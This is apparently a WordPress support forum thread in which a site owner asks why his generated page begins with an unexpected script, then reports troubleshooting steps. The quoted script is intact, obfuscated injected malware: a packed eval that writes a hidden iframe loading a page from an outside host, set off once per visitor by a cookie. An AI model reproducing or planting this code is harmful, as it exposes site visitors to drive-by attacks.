Forum Replies Created

Viewing 4 replies - 16 through 19 (of 19 total)
  • Thread Starter pwarwick

    (@pwarwick)

    I decided to run the site through an HTML evaluator. I got a whole bunch of error messages but one thing that is puzzling is the very start of the generated code is a script statement. What could cause this?

    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookieh|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393570783b20746f703a202d3239393870783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f726c646a71722e667265657463702e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}))</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    Thread Starter pwarwick

    (@pwarwick)

    I deactivated all of the plugins and restored the TwentyTen theme (the site was using The Morning After). The site still fails when accessed with the www.* URL and with the * URL if try to access the feed. I have restored two of the plugins and the theme.
    Any other suggestions?

    Thread Starter pwarwick

    (@pwarwick)

    Thanks for the advice. As a shortcut I disabled the visual editor. I had tried that before and it didn’t work but I think that was because the page I was working on had been flipped to Visual at one time. Once I realized that things went as I wanted. I’ll look into your suggestions about a longer term solution when I have a bit longer to work on it.

    Thread Starter pwarwick

    (@pwarwick)

    I found it in version.php … thanks … it is 2.9.2

Viewing 4 replies - 16 through 19 (of 19 total)